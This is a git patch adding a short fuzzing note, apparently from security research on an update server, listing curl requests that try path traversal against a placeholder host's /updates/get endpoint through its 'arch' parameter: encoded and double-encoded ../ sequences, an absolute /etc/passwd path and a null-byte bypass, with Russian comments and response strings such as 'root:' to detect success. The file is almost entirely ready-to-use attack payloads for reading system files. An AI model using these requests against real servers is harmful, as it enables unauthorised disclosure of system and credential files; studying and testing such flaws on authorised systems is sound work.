From 8b0b7a2aeb9cc0e6609c84e124ffde65bdae2726 Mon Sep 17 00:00:00 2001
From: hugy <jbcase7o7@kjhs.mm>
Date: Fri, 29 May 2026 07:59:31 +0000
Subject: [PATCH] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=B8=D1=82?=
 =?UTF-8?q?=D1=8C=20rosetta-sdu-2026-0000/FUZZRAW.txt?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 rosetta-sdu-2026-0000/FUZZRAW.txt | 12 ++++++++++++
 1 file changed, 12 insertions(+)
 create mode 100644 rosetta-sdu-2026-0000/FUZZRAW.txt

diff --git a/rosetta-sdu-2026-0000/FUZZRAW.txt b/rosetta-sdu-2026-0000/FUZZRAW.txt
new file mode 100644
index 0000000..05650aa
--- /dev/null
+++ b/rosetta-sdu-2026-0000/FUZZRAW.txt
@@ -0,0 +1,12 @@
+
+curl "http://target/updates/get?platform=android&arch=%2e%2e%2f%2e%2e%2fetc%2fpasswd&app=1.0.0&kernel=0.0.0"
+curl "http://target/updates/get?platform=android&arch=%252e%252e%252fetc%2fpasswd&app=1.0.0&kernel=0.0.0"
+
+абсолютные пути
+curl "http://target/updates/get?platform=android&arch=/etc/passwd&app=1.0.0&kernel=0.0.0"
+
+Null-byte обход (лажа врятли сервер будет старый но все же)
+curl "http://target/updates/get?platform=android&arch=../../../etc/passwd%00.jar&app=1.0.0&kernel=0.0.0"
+
+ не только на `kernelUrl`, но и на тело ответа
+   "root:", "USER=", "localhost", "java.version", "os.name" 
\ No newline at end of file